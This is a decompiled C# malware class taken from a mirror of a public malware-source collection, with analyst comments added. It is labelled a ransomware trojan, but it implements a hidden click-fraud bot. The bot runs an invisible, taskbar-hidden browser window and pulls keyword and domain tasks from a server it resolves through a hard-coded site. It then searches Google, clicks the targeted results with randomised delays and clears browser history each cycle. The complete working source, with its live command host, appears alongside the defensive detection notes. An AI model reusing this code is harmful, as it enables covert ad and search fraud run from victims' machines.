mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Form1
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
  /// <summary>
  /// Analyst annotations on a decompiled sample; the code itself is left exactly as decompiled so it
  /// still corresponds to the binary named in the decompiler header.
  ///
  /// What this class does, as far as the visible code shows: it hosts an invisible Internet Explorer
  /// (WebBrowser) control, resolves a task-server host from a fixed web page, downloads a list of
  /// "keyword|domain" rows, and then, for each row, searches google.com.tr for the keyword, clicks the
  /// result that points at the listed domain, clicks one more link on that site, waits about four
  /// minutes and repeats with the next row. All actions are spaced with randomised delays.
  ///
  /// The decompiler header labels the sample Trojan-Ransom.Win32.Blocker; nothing in this class
  /// encrypts, locks or displays anything. Other types in the assembly (for example Araclar) are not
  /// shown here.
  ///
  /// Observable artefacts in this class that are useful for detection:
  ///  - an HTTP GET to the URL in <c>ana</c> carrying the misspelled User-Agent set in PanelAyarla;
  ///  - an HTTP GET to the <c>baba</c> URL (path /v/v.php) with no User-Agent configured;
  ///  - repeated child processes "RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1" and "... 8";
  ///  - a top-level window with opacity 0, no taskbar button and the WS_EX_TOOLWINDOW style.
  /// </summary>
  public sealed class Form1 : Form
  {
    // Win32 constants. The call sites further down show the literal values (-20, 128, 42) rather
    // than these names because the compiler inlines constants.
    private const int GWL_EXSTYLE = -20;
    private const int WS_EX_TOOLWINDOW = 128;
    private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
    private IContainer components;
    private WebBrowser webBrowser1;
    // "ana": page fetched once at start-up; PanelAyarla extracts a value from its body.
    private string ana = "http://www.nurullahuzmez.com";
    // "baba": task-list URL template. "[DEGISTIR]" (Turkish: "replace") is substituted with the
    // value taken from the "ana" page, so the task host is not hard-coded in the binary.
    private string baba = "http://[DEGISTIR]/v/v.php";
    // "kelimelistesi" (word list): pending tasks, Key = search keyword, Value = target domain.
    private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
    // Keyword and target domain of the task currently being processed.
    private string kelime;
    private string domain;
    // "suankisayfa" (current page): result page number, reset to 1 for every task.
    private int suankisayfa = 1;
    // "gezilenler" (visited): target domain -> whether the on-site click has already been made.
    private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
    // Source of all delays, window dimensions and link choices below.
    private Random rnd = new Random();

    /// <summary>Standard WinForms designer disposal of the component container.</summary>
    protected override void Dispose(bool disposing)
    {
      if (disposing && this.components != null)
        this.components.Dispose();
      base.Dispose(disposing);
    }

    /// <summary>
    /// Designer-style initialisation. Builds the embedded browser and configures the form so that
    /// nothing is visible to the user.
    /// </summary>
    private void InitializeComponent()
    {
      this.webBrowser1 = new WebBrowser();
      this.SuspendLayout();
      this.webBrowser1.Dock = DockStyle.Fill;
      this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
      this.webBrowser1.Location = new Point(0, 0);
      this.webBrowser1.Name = "webBrowser1";
      // Script error dialogs are suppressed, so a failing page never raises a visible prompt.
      this.webBrowser1.ScriptErrorsSuppressed = true;
      this.webBrowser1.Size = new Size(761, 488);
      this.webBrowser1.TabIndex = 0;
      this.webBrowser1.WebBrowserShortcutsEnabled = false;
      // DocumentCompleted drives the whole search/click sequence; NewWindow blocks pop-ups.
      this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
      this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      this.ClientSize = new Size(761, 488);
      this.Controls.Add((Control) this.webBrowser1);
      this.Name = nameof (Form1);
      // Fully transparent, no icon, no taskbar button: the window exists but cannot be seen.
      this.Opacity = 0.0;
      this.ShowIcon = false;
      this.ShowInTaskbar = false;
      this.StartPosition = FormStartPosition.CenterScreen;
      this.Load += new EventHandler(this.Form1_Load);
      this.ResumeLayout(false);
    }

    // Imported but not called anywhere in this class.
    [DllImport("user32.dll")]
    public static extern bool SetForegroundWindow(IntPtr hWnd);

    // Used in Form1_Load to add an extended window style.
    [DllImport("user32.dll")]
    public static extern int SetWindowLong(IntPtr window, int index, int value);

    // Used in Form1_Load to read the current extended window style.
    [DllImport("user32.dll")]
    public static extern int GetWindowLong(IntPtr window, int index);

    // Imported but not called anywhere in this class.
    [DllImport("winmm.dll")]
    public static extern int sndPlaySound(string lpszSoundName, int uFlags);

    // Used in DeleteCache with option 42 (INTERNET_OPTION_END_BROWSER_SESSION above).
    [DllImport("wininet.dll", SetLastError = true)]
    private static extern bool InternetSetOption(
      IntPtr hInternet,
      int dwOption,
      IntPtr lpBuffer,
      int lpdwBufferLength);

    /// <summary>Constructs the form; all work starts later from the Load event.</summary>
    public Form1() => this.InitializeComponent();

    /// <summary>Cancels every attempt by a page to open a new window.</summary>
    private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;

    /// <summary>
    /// "Basla" (start): begins the next task. Clears browser traces, takes the next keyword/domain
    /// pair from the queue and navigates to the search home page. When the queue is empty, Dequeue
    /// throws InvalidOperationException and the process exits with code -1.
    /// </summary>
    private void Basla()
    {
      this.DeleteCache();
      try
      {
        this.suankisayfa = 1;
        KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
        this.kelime = keyValuePair.Key;
        this.domain = keyValuePair.Value;
        // Busy-waits on the calling thread until the control reports it is idle.
        // NOTE(review): callers here are the Load handler and WinForms timer ticks, so this looks
        // like it spins on the UI thread - confirm how IsBusy can change while it loops.
        while (this.webBrowser1.IsBusy)
          Thread.SpinWait(10000);
        this.webBrowser1.Navigate("http://www.google.com.tr");
      }
      catch (InvalidOperationException ex)
      {
        Environment.Exit(-1);
      }
    }

    /// <summary>
    /// "KelimeleriCek" (fetch the words): downloads the task list from the resolved <c>baba</c> URL
    /// and fills the queue. Expected body format: one task per line, "keyword|domain". Any download
    /// failure terminates the process with code -1. This WebClient has no headers configured, unlike
    /// the one in PanelAyarla.
    /// </summary>
    private void KelimeleriCek()
    {
      using (WebClient webClient = new WebClient())
      {
        string str1 = "";
        try
        {
          str1 = webClient.DownloadString(this.baba);
        }
        catch (Exception ex)
        {
          Environment.Exit(-1);
        }
        string str2 = str1;
        char[] chArray = new char[1]{ '\n' };
        foreach (string str3 in str2.Split(chArray))
        {
          string[] strArray = str3.Trim().Split('|');
          try
          {
            // strArray[0] = keyword, strArray[1] = domain.
            string key = strArray[1];
            KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
            // Add throws on a domain that is already present, which skips the Enqueue below, so
            // only the first row for each domain is queued.
            this.gezilenler.Add(key, false);
            this.kelimelistesi.Enqueue(keyValuePair);
          }
          catch
          {
            // Rows without a '|' (index out of range) and duplicate domains are dropped silently.
          }
        }
      }
    }

    /// <summary>
    /// "BirineTikla" (click one): fires mouseover, mousedown and click on every input element whose
    /// name contains "btnG" or "btnK". No caller is visible in this class.
    /// </summary>
    private void BirineTikla()
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
      {
        if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
        {
          htmlElement.RaiseEvent("onmouseover");
          htmlElement.RaiseEvent("onmousedown");
          htmlElement.InvokeMember("click");
        }
      }
    }

    /// <summary>
    /// "ButonTikla" (click button): same event sequence as BirineTikla, applied to every input
    /// element whose <paramref name="attribute"/> contains <paramref name="value"/>. No caller is
    /// visible in this class.
    /// </summary>
    private void ButonTikla(string attribute, string value)
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
      {
        if (htmlElement.GetAttribute(attribute).Contains(value))
        {
          htmlElement.RaiseEvent("onmouseover");
          htmlElement.RaiseEvent("onmousedown");
          htmlElement.InvokeMember("click");
        }
      }
    }

    /// <summary>
    /// "ButonaTekrarTikla" (click the button again): as ButonTikla, but iterates "button" elements
    /// instead of "input" elements. No caller is visible in this class.
    /// </summary>
    private void ButonaTekrarTikla(string attribute, string value)
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
      {
        if (htmlElement.GetAttribute(attribute).Contains(value))
        {
          htmlElement.RaiseEvent("onmouseover");
          htmlElement.RaiseEvent("onmousedown");
          htmlElement.InvokeMember("click");
        }
      }
    }

    /// <summary>
    /// Page-load handler that acts as the state machine of the class. The URL of the completed
    /// document selects the next step; every step is deferred through SureliIslet with a random
    /// delay. All URL literals compared here use the http:// scheme.
    /// </summary>
    private void webBrowser1_DocumentCompleted(
      object sender,
      WebBrowserDocumentCompletedEventArgs e)
    {
      string str = e.Url.ToString();
      // Step 1 - search home page: after 2-4 s write the keyword into the input named "q", then
      // submit the form another 4-5 s later.
      if (str == "http://www.google.com.tr/")
        this.SureliIslet((Form1.SureliFonksiyon) (() =>
        {
          this.TextBoxYaz("name", "q", this.kelime);
          this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
        }), 2000, 4000);
      // Step 2 - results page (URL contains "hl=tr"): after 3-6 s click the result for the target
      // domain; if no such link is on the page, move to the next result page 5-12 s later.
      else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
      {
        // Unused local copy; presumably a decompiler artefact.
        int suankisayfa = this.suankisayfa;
        this.SureliIslet((Form1.SureliFonksiyon) (() =>
        {
          if (this.LinkeTikla(this.domain))
            return;
          this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
        }), 3000, 6000);
      }
      // Step 3 - a page whose URL contains the target domain and is not a Google URL: stay 20-50 s,
      // then, once per domain, make one further click on the site.
      else
      {
        if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
          return;
        this.SureliIslet((Form1.SureliFonksiyon) (() =>
        {
          // The flag keeps later page loads on the same site from restarting the sequence.
          if (this.gezilenler[this.domain])
            return;
          this.gezilenler[this.domain] = true;
          this.RastGeleGez();
        }), 20000, 50000);
      }
    }

    /// <summary>Invokes submit on every form element of the current document.</summary>
    private void SubmitForm()
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
        htmlElement.InvokeMember("submit");
    }

    /// <summary>
    /// "Ilerle" (advance): increments the result page counter and clicks every link whose visible
    /// text equals that number, with or without a trailing space. Unlike the sibling methods, this
    /// one does not check Document for null before enumerating its links.
    /// </summary>
    private void Ilerle()
    {
      ++this.suankisayfa;
      foreach (HtmlElement link in this.webBrowser1.Document.Links)
      {
        if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
        {
          link.RaiseEvent("onmouseover");
          link.RaiseEvent("onmousedown");
          link.InvokeMember("click");
        }
      }
    }

    /// <summary>
    /// "RastGeleGez" (browse at random): on the target site, collects anchors that do not open a new
    /// window, have visible text and pass NormalLink, fires the click sequence on randomly chosen
    /// ones, and then schedules the next task.
    /// </summary>
    private void RastGeleGez()
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
      List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
      if (elementsByTagName.Count > 0)
      {
        foreach (HtmlElement htmlElement in elementsByTagName)
        {
          if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
            htmlElementList.Add(htmlElement);
        }
        if (htmlElementList.Count > 0)
        {
          // Each of the three calls draws its own random index, so mouseover, mousedown and click
          // can land on three different anchors. Next(Count - 1) has an exclusive upper bound, so
          // the last collected anchor is never selected.
          htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
          htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
          htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
          htmlElementList.Clear();
        }
      }
      // Runs whether or not a link was clicked: after 5-6 s arm a second timer of roughly 240 s,
      // which calls Basla for the next queued task. This gives one task about every four minutes.
      this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
    }

    /// <summary>
    /// Returns false for hrefs ending in one of the listed suffixes (feeds, images, archives,
    /// executables, media and similar), true otherwise. Only the end of the string is tested.
    /// </summary>
    private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");

    /// <summary>
    /// Clears Internet Explorer state before each task by running the Internet control panel's
    /// ClearMyTracksByProcess entry point twice and then ending the WinINet browser session.
    /// The flag values are commonly documented as 1 = browsing history and 8 = temporary Internet
    /// files. Called from Basla, so both rundll32 child processes recur on every task; that
    /// parent/child pattern is visible in process-creation telemetry.
    /// </summary>
    private void DeleteCache()
    {
      Process.Start(new ProcessStartInfo()
      {
        FileName = "RunDll32.exe",
        Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
      }).WaitForExit();
      Process.Start(new ProcessStartInfo()
      {
        FileName = "RunDll32.exe",
        Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
      }).WaitForExit();
      // 42 is INTERNET_OPTION_END_BROWSER_SESSION, declared at the top of the class.
      Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
    }

    /// <summary>
    /// "TextBoxYaz" (write text box): sets the value of every input element whose attribute
    /// <paramref name="att"/> equals <paramref name="attname"/> to <paramref name="attvalue"/>.
    /// </summary>
    private void TextBoxYaz(string att, string attname, string attvalue)
    {
      if (!(this.webBrowser1.Document != (HtmlDocument) null))
        return;
      foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
      {
        if (htmlElement.GetAttribute(att).Equals(attname))
          htmlElement.SetAttribute("value", attvalue);
      }
    }

    /// <summary>
    /// "LinkeTikla" (click the link): clicks the first link on the page whose href contains
    /// <paramref name="url"/>, skipping cached-copy and "related:" links.
    /// </summary>
    /// <returns>true when a link was clicked, false when none matched or no document is loaded.</returns>
    private bool LinkeTikla(string url)
    {
      bool flag = false;
      // Filled with every href seen but never read afterwards.
      List<string> stringList = new List<string>();
      if (this.webBrowser1.Document != (HtmlDocument) null)
      {
        foreach (HtmlElement link in this.webBrowser1.Document.Links)
        {
          string attribute = link.GetAttribute("href");
          stringList.Add(attribute);
          if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&q=related:") && link.GetAttribute("href").Contains(url))
          {
            link.RaiseEvent("onmouseover");
            link.RaiseEvent("onmousedown");
            link.InvokeMember("Click");
            flag = true;
            break;
          }
        }
      }
      return flag;
    }

    /// <summary>
    /// "SureliIslet" (run timed): runs <paramref name="x"/> once on a WinForms timer after a random
    /// delay of at least <paramref name="min"/> and less than <paramref name="max"/> milliseconds.
    /// These jittered delays are what spaces every action in the class.
    /// </summary>
    private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
    {
      System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
      {
        Interval = this.rnd.Next(min, max)
      };
      timer.Tick += (EventHandler) ((s, ev) =>
      {
        // The callback runs first; the timer is stopped and disposed afterwards.
        x();
        ((System.Windows.Forms.Timer) s).Stop();
        ((Component) s).Dispose();
      });
      timer.Start();
    }

    /// <summary>
    /// "PanelAyarla" (set up panel): resolves the task-server host. Downloads the <c>ana</c> page,
    /// takes the text captured by the first match of the pattern "1(.*?)2" and substitutes it for
    /// "[DEGISTIR]" in <c>baba</c>. Any exception terminates the process with code -1.
    /// </summary>
    private void PanelAyarla()
    {
      string newValue = "";
      WebHeaderCollection headerCollection1 = new WebHeaderCollection();
      // Fixed User-Agent containing the misspelling "compatiple"; a distinctive string to look
      // for in proxy or web-gateway logs.
      headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
      WebHeaderCollection headerCollection2 = headerCollection1;
      using (WebClient webClient = new WebClient()
      {
        Encoding = Encoding.Default,
        Headers = headerCollection2
      })
      {
        try
        {
          // When the pattern does not match, Groups[1] is empty and newValue stays "".
          newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
        }
        catch (Exception ex)
        {
          Environment.Exit(-1);
        }
      }
      this.baba = this.baba.Replace("[DEGISTIR]", newValue);
    }

    /// <summary>
    /// Load handler and start-up sequence: randomise the window size, hide the window from the
    /// task switcher, check the IE version, resolve the task server, download the task list,
    /// call Araclar.DisableClickSounds (defined outside this class) and start the first task.
    /// </summary>
    private void Form1_Load(object sender, EventArgs e)
    {
      // Width 1280-1365 and height 600-699, chosen anew on every run.
      this.Size = new Size(this.rnd.Next(1280, 1366), this.rnd.Next(600, 700));
      // -20 is GWL_EXSTYLE and 128 is WS_EX_TOOLWINDOW (see the constants above). Tool windows
      // are left out of the taskbar and the Alt+Tab list.
      Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
      this.ieKontrol();
      this.PanelAyarla();
      this.KelimeleriCek();
      Araclar.DisableClickSounds();
      this.Basla();
    }

    /// <summary>
    /// "ieKontrol" (IE check): exits with code -1 when the installed WebBrowser control reports a
    /// major version below 7. The temporary WebBrowser created for the check is not disposed.
    /// </summary>
    private void ieKontrol()
    {
      if (new WebBrowser().Version.Major < 7)
        Environment.Exit(-1);
    }

    // "SureliFonksiyon" (timed function): parameterless callback type accepted by SureliIslet.
    private delegate void SureliFonksiyon();
  }
}